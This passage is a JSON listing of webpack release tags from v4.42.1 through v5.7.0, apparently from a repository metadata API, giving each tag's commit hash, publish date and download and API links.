{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha"